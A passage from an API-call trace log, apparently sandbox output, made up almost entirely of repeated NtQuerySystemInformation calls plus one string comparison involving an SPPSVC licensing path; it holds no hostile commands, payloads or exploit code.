(SystemInformationClass=0xb9, SystemInformation=0xf7a68fd890, Length=0x50, ResultLength=0x0) [0277.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd890, Length=0x50, ResultLength=0x0) [0277.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd780, Length=0x50, ResultLength=0x0) [0277.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd780, Length=0x50, ResultLength=0x0) [0277.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd780, Length=0x50, ResultLength=0x0) [0277.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd780, Length=0x50, ResultLength=0x0) [0277.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd6b0, Length=0x38, ResultLength=0x0) [0277.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd4e0, Length=0x28, ResultLength=0x0) [0277.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd4e0, Length=0x28, ResultLength=0x0) [0277.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd4e0, Length=0x28, ResultLength=0x0) [0277.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd4e0, Length=0x28, ResultLength=0x0) [0277.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd550, Length=0x28, ResultLength=0x0) [0277.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd6b0, Length=0x38, ResultLength=0x0) [0277.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd5d0, Length=0x28, ResultLength=0x0) [0277.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd5d0, Length=0x28, ResultLength=0x0) [0277.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd470, Length=0x20, ResultLength=0x0) [0277.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd3f0, Length=0x20, ResultLength=0x0) [0277.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd3f0, Length=0x20, ResultLength=0x0) [0277.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd3f0, Length=0x20, ResultLength=0x0) [0277.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd6b0, Length=0x38, ResultLength=0x0) [0277.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd6b0, Length=0x38, ResultLength=0x0) [0277.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd530, Length=0x20, ResultLength=0x0) [0277.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd4c0, Length=0x20, ResultLength=0x0) [0277.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd4c0, Length=0x20, ResultLength=0x0) [0277.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdae0, Length=0x50, ResultLength=0x0) [0277.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdae0, Length=0x50, ResultLength=0x0) [0277.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdae0, Length=0x50, ResultLength=0x0) [0277.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd9d0, Length=0x50, ResultLength=0x0) [0277.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd9d0, Length=0x50, ResultLength=0x0) [0277.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd9d0, Length=0x50, ResultLength=0x0) [0277.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd9d0, Length=0x50, ResultLength=0x0) [0277.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd900, Length=0x38, ResultLength=0x0) [0277.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd730, Length=0x28, ResultLength=0x0) [0277.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd730, Length=0x28, ResultLength=0x0) [0277.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd730, Length=0x28, ResultLength=0x0) [0277.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd7a0, Length=0x28, ResultLength=0x0) [0277.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd900, Length=0x38, ResultLength=0x0) [0277.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd820, Length=0x28, ResultLength=0x0) [0277.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd820, Length=0x28, ResultLength=0x0) [0277.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd900, Length=0x38, ResultLength=0x0) [0277.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd780, Length=0x20, ResultLength=0x0) [0277.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd700, Length=0x20, ResultLength=0x0) [0277.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd700, Length=0x20, ResultLength=0x0) [0277.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd700, Length=0x20, ResultLength=0x0) [0277.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd900, Length=0x38, ResultLength=0x0) [0277.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd780, Length=0x20, ResultLength=0x0) [0277.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd710, Length=0x20, ResultLength=0x0) [0277.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd710, Length=0x20, ResultLength=0x0) [0277.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdae0, Length=0x50, ResultLength=0x0) [0277.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdae0, Length=0x50, ResultLength=0x0) [0277.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdae0, Length=0x50, ResultLength=0x0) [0277.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd9d0, Length=0x50, ResultLength=0x0) [0277.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd9d0, Length=0x50, ResultLength=0x0) [0277.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd9d0, Length=0x50, ResultLength=0x0) [0277.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd9d0, Length=0x50, ResultLength=0x0) [0277.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd900, Length=0x38, ResultLength=0x0) [0277.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd730, Length=0x28, ResultLength=0x0) [0277.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd730, Length=0x28, ResultLength=0x0) [0277.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd730, Length=0x28, ResultLength=0x0) [0277.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd7a0, Length=0x28, ResultLength=0x0) [0277.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd900, Length=0x38, ResultLength=0x0) [0277.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd820, Length=0x28, ResultLength=0x0) [0277.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd820, Length=0x28, ResultLength=0x0) [0277.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd900, Length=0x38, ResultLength=0x0) [0277.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd780, Length=0x20, ResultLength=0x0) [0277.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd700, Length=0x20, ResultLength=0x0) [0277.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd700, Length=0x20, ResultLength=0x0) [0277.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd700, Length=0x20, ResultLength=0x0) [0277.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd900, Length=0x38, ResultLength=0x0) [0277.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd780, Length=0x20, ResultLength=0x0) [0277.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd710, Length=0x20, ResultLength=0x0) [0277.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd710, Length=0x20, ResultLength=0x0) [0277.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdb90, Length=0x50, ResultLength=0x0) [0277.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdb10, Length=0x28, ResultLength=0x0) [0277.323] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0277.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdb90, Length=0x50, ResultLength=0x0) [0277.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdb90, Length=0x50, ResultLength=0x0) [0277.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdb90, Length=0x50, ResultLength=0x0) [0277.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdac0, Length=0x38, ResultLength=0x0) [0277.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8f0, Length=0x28, ResultLength=0x0) [0277.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8f0, Length=0x28, ResultLength=0x0) [0277.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8f0, Length=0x28, ResultLength=0x0) [0277.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd960, Length=0x28, ResultLength=0x0) [0277.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdac0, Length=0x38, ResultLength=0x0) [0277.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd9e0, Length=0x28, ResultLength=0x0) [0277.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd9e0, Length=0x28, ResultLength=0x0) [0277.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdac0, Length=0x38, ResultLength=0x0) [0277.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd940, Length=0x20, ResultLength=0x0) [0277.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8c0, Length=0x20, ResultLength=0x0) [0277.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8c0, Length=0x20, ResultLength=0x0) [0277.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8c0, Length=0x20, ResultLength=0x0) [0277.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdac0, 